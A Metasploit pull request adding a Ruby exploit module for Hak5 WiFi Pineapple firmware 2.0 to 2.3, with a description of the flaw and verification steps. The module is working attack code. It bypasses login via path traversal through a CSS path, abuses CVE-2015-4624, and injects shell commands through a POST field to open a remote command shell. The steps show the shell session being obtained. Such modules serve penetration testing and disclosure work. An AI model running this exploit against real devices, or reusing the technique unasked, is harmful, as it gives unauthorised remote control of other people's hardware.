### PR TITLE
Adding WiFi pineapple command injection via authentication bypass.

### DIFF
--- a/modules/exploits/linux/http/pineapple_bypass_cmdinject.rb
+++ b/modules/exploits/linux/http/pineapple_bypass_cmdinject.rb
@@ -1,0 +1,107 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Hak5 WiFi Pineapple Preconfiguration Command Injection',
+      'Description'    => %q{
+      This module exploits a login/csrf check bypass vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4.
+      These devices may typically be identified by their SSID beacons of 'Pineapple5_....';
+      Provided as part of the TospoVirus workshop at DEFCON23.
+      },
+      'Author'         => ['catatonicprime'],
+      'License'        => MSF_LICENSE,
+      'References'     => [ ],
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'Privileged'     => false,
+      'Payload'        => {
+        'Space'        => 2048,
+        'DisableNops'  => true,
+        'Compat'       =>
+          {
+            'PayloadType' => 'cmd',
+            'RequiredCmd' => 'generic python netcat telnet'
+          }
+      },
+      'Targets'        =>
+        [
+          [ 'WiFi Pineapple 2.0.0 - 2.3.0', {} ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Aug 1 2015'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'Path to the command injection', '/components/system/configuration/functions.php' ]),
+        Opt::RPORT(1471),
+        Opt::RHOST('172.16.42.1')
+      ]
+    )
+
+    deregister_options(
+      'ContextInformationFile',
+      'DOMAIN',
+      'DigestAuthIIS',
+      'EnableContextEncoding',
+      'FingerprintCheck',
+      'HttpClientTimeout',
+      'NTLM::SendLM',
+      'NTLM::SendNTLM',
+      'NTLM::SendSPN',
+      'NTLM::UseLMKey',
+      'NTLM::UseNTLM2_session',
+      'NTLM::UseNTLMv2',
+      'SSL',
+      'SSLVersion',
+      'VERBOSE',
+      'WORKSPACE',
+      'WfsDelay',
+      'Proxies',
+      'VHOST'
+    )
+  end
+
+  def cmd_uri
+    normalize_uri('includes', 'css', 'styles.php', '../../..', target_uri.path)
+  end
+
+  def cmd_inject(cmd)
+    res = send_request_cgi(
+      'method'     => 'POST',
+      'uri'        => cmd_uri,
+      'vars_get'   => {
+        'execute'  => "" # Presence triggers command execution
+      },
+      'vars_post'  => {
+        'commands' => cmd
+      })
+    res
+  end
+
+  def check
+    res = cmd_inject("echo")
+    if res && res.code == 200 && res.body =~ /Executing/
+      return Exploit::CheckCode::Vulnerable
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    print_status('Attempting to bypass login/csrf checks...')
+    unless check
+      fail_with(Failure::NoAccess, 'Failed to bypass login/csrf check...')
+    end
+    print_status('Executing payload...')
+    cmd_inject("#{payload.encoded}")
+  end
+end


### PR DESCRIPTION
Adding attacks for WiFi pineapples (versions prior to 2.4 release). These attacks affect pre-configured pineapples for slightly older firmware versions. The attacks include an authentication bypass and a brute-force for the a proof-of-ownership challenge (the flashing LEDs).

The 'pineapple_bypass_cmdinject' exploit attacks a weak check for pre-authorized files (CSS files) which allows the attacker to bypass logging in at all and then relies on the anti-CSRF vulnerability (CVE-2015-4624) to obtain command injection.

Exploit uses a utility function in /components/system/configuration/functions.php to execute commands once authorization has been bypassed.
# Verification

The below requires a "fresh" pineapple, flashed with version 2.0-2.3. The default options are generally effective due to having a set state after being flashed. You will need to be connected to the WiFi pineapple network (e.g. via WiFi or ethernet).

Assuming the above 2.3 firmware is installed, this should always work, if it does not, try again? If it still does not, write me I guess? But it's a "default" configuration bug so it should always work.
## Verify Bypass Command Injection
- [x] Start `msfconsole`
- [x] `use exploit/linux/http/pineapple_bypass_cmdinject`
- [x] `exploit`
- [x] **Verify** Command shell session x opened
